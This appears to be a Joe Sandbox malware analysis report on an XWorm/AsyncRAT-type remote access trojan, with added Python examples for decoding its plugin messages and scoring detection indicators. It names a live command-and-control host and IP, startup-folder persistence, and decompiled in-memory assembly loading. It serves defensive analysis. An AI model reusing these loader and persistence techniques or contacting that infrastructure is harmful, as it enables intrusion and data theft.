Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: mpr.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: scrrun.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: propsys.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: linkinfo.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: ntshrui.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: cscapi.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: amsi.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: userenv.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: avicap32.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: msvfw32.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\InProcServer32
Source: x-manager.lnk.0.dr | LNK file: ..\..\..\..\..\x-manager.exe
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                  Data Obfuscation

                  barindex
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x-manager.exe.0.dr, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: x-manager.exe.0.dr, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs; .Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs; .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs; .Net Code: Memory System.AppDomain.Load(byte[])
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, Messages.cs; .Net Code: Memory
Source: x-manager.exe.0.dr, Messages.cs; .Net Code: Plugin System.AppDomain.Load(byte[])
Source: x-manager.exe.0.dr, Messages.cs; .Net Code: Memory System.AppDomain.Load(byte[])
Source: x-manager.exe.0.dr, Messages.cs; .Net Code: Memory
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs; .Net Code: Plugin System.AppDomain.Load(byte[])
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs; .Net Code: Memory System.AppDomain.Load(byte[])
Source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack, Messages.cs; .Net Code: Memory
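The Messages.cs entries above show the plugin path of this sample: a C2 message is split into fields (Pack), field 3 is base64-decoded and decompressed, and the result is handed to AppDomain.Load(byte[]) and invoked late-bound with field 2 as its argument. The following is an added example, not code from the report or from the malware's own source, that replicates that unpacking in Python so a captured message can be decoded offline and the loaded assembly recovered. It assumes three things the report does not state: the splitter string (the report only shows Settings.SPL; the value below is made up), that Helper.Decompress is GZip (inferred from the .NET naming), and that field 1 is unused. The sample message is constructed in the block.

```python
"""
Added example (not from the Joe Sandbox report or the XWorm code base):
decode a captured "plugin" message the way the flagged Messages.cs call
site does, and recover the bytes AppDomain.Load(byte[]) would receive.

Assumptions (none stated by the report):
  * fields are split on the configured SPL string; SPL below is made up
  * Helper.Decompress is GZip (inferred from the .NET naming, unverified)
  * Pack[2] is a plugin identifier and Pack[3] the base64 payload, as the
    decompiled Invoke call uses them; Pack[1] is treated as unused
"""
import base64
import gzip
import struct
from dataclasses import dataclass

SPL = "<SPLITTER>"  # assumed stand-in for Settings.SPL


@dataclass
class PluginMessage:
    command: str    # Pack[0]
    plugin_id: str  # Pack[2], first argument of the late-bound Invoke
    payload: bytes  # decompressed Pack[3], what AppDomain.Load would get
    is_pe: bool     # payload carries a valid MZ/PE header


def looks_like_pe(data: bytes) -> bool:
    """True if data has an MZ DOS header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def decompress(blob: bytes) -> bytes:
    """Stand-in for Helper.Decompress; assumed to be GZip."""
    return gzip.decompress(blob)


def parse_plugin_message(raw: str, spl: str = SPL) -> PluginMessage:
    """Mirror of: Invoke(Pack[2], Helper.Decompress(Convert.FromBase64String(Pack[3])))"""
    pack = raw.split(spl)
    if len(pack) < 4:
        raise ValueError(f"expected at least 4 fields, got {len(pack)}")
    payload = decompress(base64.b64decode(pack[3]))
    return PluginMessage(
        command=pack[0],
        plugin_id=pack[2],
        payload=payload,
        is_pe=looks_like_pe(payload),
    )


def fake_pe() -> bytes:
    """Constructed stand-in for a plugin assembly: a 64-byte DOS header with
    e_lfanew = 0x40, then the PE signature and filler. Not runnable; it only
    needs to satisfy looks_like_pe()."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\0\0" + b"\0" * 28


def build_plugin_message(plugin_id: str, assembly: bytes, spl: str = SPL) -> str:
    """Builds a message in the assumed layout (constructed, for demonstration):
    command, unused field, plugin id, base64(gzip(assembly))."""
    payload = base64.b64encode(gzip.compress(assembly)).decode()
    return spl.join(["plugin", "", plugin_id, payload])


if __name__ == "__main__":
    msg = build_plugin_message("deadbeef", fake_pe())
    parsed = parse_plugin_message(msg)
    print(parsed.command, parsed.plugin_id, parsed.is_pe, len(parsed.payload))
```

When applying this to real traffic, take SPL and the decompression routine from the decoded configuration and the Helper class of the specific sample rather than from the assumptions above; if the recovered payload passes the PE check, that is the in-memory assembly that never touches disk and is the artefact worth carving for further analysis.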
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; File created: C:\Users\user\AppData\Roaming\x-manager.exe (dropped file)
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x-manager.lnk (2 identical entries collapsed)
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Process information set: NOOPENFILEERRORBOX (47 identical entries collapsed)

                  Malware Analysis System Evasion

Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController (23 identical entries collapsed)
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Memory allocated: 14B0000 memory reserve | memory write watch
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Memory allocated: 1B040000 memory reserve | memory write watch
(Caveat: the .NET CLR garbage collector reserves its heap with MEM_WRITE_WATCH, so for a managed sample these two entries are expected runtime behaviour and not evidence of sandbox evasion on their own.)
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Thread delayed: delay time: 922337203685477 (this is TimeSpan.MaxValue expressed in milliseconds, i.e. an effectively indefinite sleep)
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Window / User API: threadDelayed 5159
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Window / User API: threadDelayed 4670
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, TID: 2536; Thread sleep time: -3689348814741908s >= -30000s
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; File Volume queried: C:\ FullSizeInformation (24 identical entries collapsed)
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Thread delayed: delay time: 922337203685477
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4108549552.000000001BABF000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
(Caveat: "Hyper-V RAW" is the name of the Hyper-V socket Winsock provider that mswsock.dll registers on every current Windows build; its presence in memory comes from the Winsock catalog and does not by itself indicate the sample is probing for a hypervisor.)
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Process token adjusted: Debug (2 identical entries collapsed)
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Memory allocated: page read and write | page guard
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Queries volume information: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe VolumeInformation
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid (a per-installation GUID; for this family it is the usual input to the bot identifier, compare Helper.ID() in the Data Obfuscation entries above)
Source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4106566774.0000000001123000.00000004.00000020.00020000.00000000.sdmp; 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4108549552.000000001BAEA000.00000004.00000020.00020000.00000000.sdmp; 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4108549552.000000001BA60000.00000004.00000020.00020000.00000000.sdmp; 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4106566774.0000000001040000.00000004.00000020.00020000.00000000.sdmp; Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe; WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct (23 identical entries collapsed)
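None of the entries in this section is strong on its own: GPU enumeration, AV-product enumeration, a MachineGuid read and a very long sleep all occur in legitimate software. What makes the sample stand out is the combination in one process together with the Startup-folder .lnk from the previous section. The following added example, not part of the report, scores behaviour log lines per process on exactly those indicators, counting each indicator once per process so the repeated WMI queries do not inflate the score by themselves. The tab-separated log format and the weights are this example's own; the sample lines are constructed to mirror the entries above.

```python
"""
Added example, not from the Joe Sandbox report: per-process triage scoring
over behaviour log lines of the kind this section lists. Indicators are
the ones seen in this report; the line format (pid TAB event TAB detail),
weights and threshold are this example's own and should be adapted to the
schema of whatever telemetry source is actually in use.
"""
import re
from collections import defaultdict

# name -> (regex over the detail column, weight); weights are illustrative
INDICATORS = {
    "wmi_videocontroller": (re.compile(r"FROM\s+Win32_VideoController", re.I), 1),
    "wmi_antivirus":       (re.compile(r"root\\SecurityCenter2.*AntivirusProduct", re.I), 2),
    "machineguid_read":    (re.compile(r"SOFTWARE\\Microsoft\\Cryptography.*MachineGuid", re.I), 1),
    "startup_lnk":         (re.compile(r"\\Start Menu\\Programs\\Startup\\[^\\]+\.lnk$", re.I), 3),
    "infinite_sleep":      (re.compile(r"delay time:\s*922337203685477"), 1),
}
ALERT_THRESHOLD = 6

LINE_RE = re.compile(r"^(?P<pid>\d+)\t(?P<event>[^\t]+)\t(?P<detail>.*)$")


def parse_line(line):
    """Returns (pid, event, detail) or None for lines that do not fit the format."""
    m = LINE_RE.match(line.rstrip("\n"))
    return (int(m["pid"]), m["event"], m["detail"]) if m else None


def score_processes(lines):
    """Returns {pid: {"score": int, "hits": sorted indicator names}}.
    Each indicator counts once per pid, so the 23 repeated WMI queries in
    the report contribute the same as a single one."""
    hits = defaultdict(set)
    for line in lines:
        parsed = parse_line(line)
        if not parsed:
            continue
        pid, _event, detail = parsed
        for name, (rx, _weight) in INDICATORS.items():
            if rx.search(detail):
                hits[pid].add(name)
    return {
        pid: {"score": sum(INDICATORS[n][1] for n in names), "hits": sorted(names)}
        for pid, names in hits.items()
    }


def alerts(lines, threshold=ALERT_THRESHOLD):
    """Pids whose combined score reaches the threshold."""
    return sorted(pid for pid, r in score_processes(lines).items() if r["score"] >= threshold)


# Constructed sample telemetry modelled on this section; pid 5224 matches the
# report's process, pid 1180 stands for a benign inventory agent that only
# reads GPU and AV state.
SAMPLE_LOG = [
    "5224\tWMI Query\tIWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_VideoController",
    "5224\tWMI Query\tIWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_VideoController",
    "5224\tWMI Query\tIWbemServices::ExecQuery - root\\SecurityCenter2 : Select * from AntivirusProduct",
    "5224\tRegistry Read\tHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Cryptography MachineGuid",
    "5224\tFile Created\tC:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\x-manager.lnk",
    "5224\tThread Delayed\tdelay time: 922337203685477",
    "1180\tWMI Query\tIWbemServices::ExecQuery - root\\cimv2 : SELECT * FROM Win32_VideoController",
    "1180\tWMI Query\tIWbemServices::ExecQuery - root\\SecurityCenter2 : Select * from AntivirusProduct",
]

if __name__ == "__main__":
    for pid, result in score_processes(SAMPLE_LOG).items():
        print(pid, result)
    print("alert on:", alerts(SAMPLE_LOG))
```

The Startup-folder .lnk carries the largest weight because it is the one indicator here that legitimate inventory or telemetry software has no reason to produce; the WMI and registry reads are kept as supporting evidence rather than as triggers in their own right.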

                  Stealing of Sensitive Information

Source: Yara match | File source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | type: SAMPLE
Source: Yara match | File source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack | type: UNPACKEDPE
Source: Yara match | File source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp | type: MEMORY
Source: Yara match | File source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: Process Memory Space: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe PID: 5224 | type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\x-manager.exe | type: DROPPED

                  Remote Access Functionality

Source: Yara match | File source: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | type: SAMPLE
Source: Yara match | File source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.unpack | type: UNPACKEDPE
Source: Yara match | File source: 0.2.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.13049ac0.1.raw.unpack | type: UNPACKEDPE
Source: Yara match | File source: 0.0.17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe.c50000.0.unpack | type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000000.1664072674.0000000000C52000.00000002.00000001.01000000.00000003.sdmp | type: MEMORY
Source: Yara match | File source: 00000000.00000002.4108233558.0000000013048000.00000004.00000800.00020000.00000000.sdmp | type: MEMORY
Source: Yara match | File source: Process Memory Space: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe PID: 5224 | type: MEMORYSTR
Source: Yara match | File source: C:\Users\user\AppData\Roaming\x-manager.exe | type: DROPPED
MITRE ATT&CK Matrix (numbers in parentheses are the counts shown in the report for that technique)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (11) | Registry Run Keys / Startup Folder (2) | Registry Run Keys / Startup Folder (2) | Masquerading (1) | Input Capture (1) | Security Software Discovery (221) | Remote Services | Input Capture (1) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | DLL Side-Loading (1) | DLL Side-Loading (1) | Disable or Modify Tools (1) | LSASS Memory | Process Discovery (1) | Remote Desktop Protocol | Archive Collected Data (11) | Non-Standard Port (1) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Virtualization/Sandbox Evasion (131) | Security Account Manager | Virtualization/Sandbox Evasion (131) | SMB/Windows Admin Shares | Data from Network Shared Drive | Non-Application Layer Protocol (1) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Deobfuscate/Decode Files or Information (1) | NTDS | Application Window Discovery (1) | Distributed Component Object Model | Input Capture | Application Layer Protocol (11) | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (2) | LSA Secrets | File and Directory Discovery (1) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | System Information Discovery (13) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop

Source | Detection | Scanner | Label | Link
17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | 84% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | 100% | Avira | TR/Spy.Gen
17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe | 100% | Joe Sandbox ML
Source | Detection | Scanner | Label | Link
C:\Users\user\AppData\Roaming\x-manager.exe | 100% | Avira | TR/Spy.Gen
C:\Users\user\AppData\Roaming\x-manager.exe | 100% | Joe Sandbox ML
C:\Users\user\AppData\Roaming\x-manager.exe | 84% | ReversingLabs | ByteCode-MSIL.Spyware.AsyncRAT
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
browser-hazard.gl.at.ply.gg | 147.185.221.23 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
browser-hazard.gl.at.ply.gg | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe, 00000000.00000002.4107271743.0000000003041000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
147.185.221.23 | browser-hazard.gl.at.ply.gg | United States | | 12087 | SALSGIVERUS | true
                      Joe Sandbox version:41.0.0 Charoite
                      Analysis ID:1546912
                      Start date and time:2024-11-01 17:30:05 +01:00
                      Joe Sandbox product:CloudBasic
                      Overall analysis duration:0h 6m 32s
                      Hypervisor based Inspection enabled:false
                      Report type:full
                      Cookbook file name:default.jbs
                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:6
                      Number of new started drivers analysed:0
                      Number of existing processes analysed:0
                      Number of existing drivers analysed:0
                      Number of injected processes analysed:0
                      Technologies:
                      • HCA enabled
                      • EGA enabled
                      • AMSI enabled
                      Analysis Mode:default
                      Analysis stop reason:Timeout
                      Sample name:17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                      Detection:MAL
                      Classification:mal100.troj.spyw.evad.winEXE@1/3@1/1
                      EGA Information:
                      • Successful, ratio: 100%
                      HCA Information:
                      • Successful, ratio: 100%
                      • Number of executed functions: 5
                      • Number of non-executed functions: 0
                      Cookbook Comments:
                      • Found application associated with file extension: .exe
                      • Override analysis time to 240000 for current running targets taking high CPU consumption
                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                      • Report size getting too big, too many NtOpenKeyEx calls found.
                      • Report size getting too big, too many NtQueryValueKey calls found.
                      • VT rate limit hit for: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
Time | Type | Description
12:31:04 | API Interceptor | 13114924x Sleep call for process: 17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe modified
16:31:01 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\x-manager.lnk
Match | Associated Sample Name / URL | Detection | Threat Name | Context
147.185.221.23 | r8gcHFIf3x.exe | malicious | XWorm
147.185.221.23 | 0eVxwphG1t.exe | malicious | XWorm
147.185.221.23 | 9RgE5uOJwX.exe | malicious | XWorm
147.185.221.23 | rustdesk.exe | malicious | XWorm
147.185.221.23 | q0SpP6HxtE.exe | malicious | XWorm
147.185.221.23 | mkDhqaw9dx.exe | malicious | XWorm
147.185.221.23 | R7iHtCsOYz.exe | malicious | XWorm
147.185.221.23 | Zvas34nq1T.exe | malicious | XWorm
147.185.221.23 | fMdcaIZWzT.exe | malicious | XWorm
147.185.221.23 | vtuLkV5KEW.exe | malicious | XWorm
No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
SALSGIVERUS | r8gcHFIf3x.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | 0eVxwphG1t.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | 9RgE5uOJwX.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | la.bot.arm.elf | malicious | Unknown | 147.176.169.71
SALSGIVERUS | rustdesk.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | Nurcraft.exe | malicious | XWorm | 147.185.221.21
SALSGIVERUS | q0SpP6HxtE.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | 7bZWBYVNPU.exe | malicious | XWorm | 147.185.221.22
SALSGIVERUS | mkDhqaw9dx.exe | malicious | XWorm | 147.185.221.23
SALSGIVERUS | R7iHtCsOYz.exe | malicious | XWorm | 147.185.221.23
No context
No context
                                          Process:C:\Users\user\Desktop\17304785458593769886a354fbce7baa74763cdd4a7b5002da27c7b9fc27af676129226c18112.dat-decoded.exe
                                          File Type:ASCII text, with CRLF line terminators
                                          Category:dropped
                                          Size (bytes):29
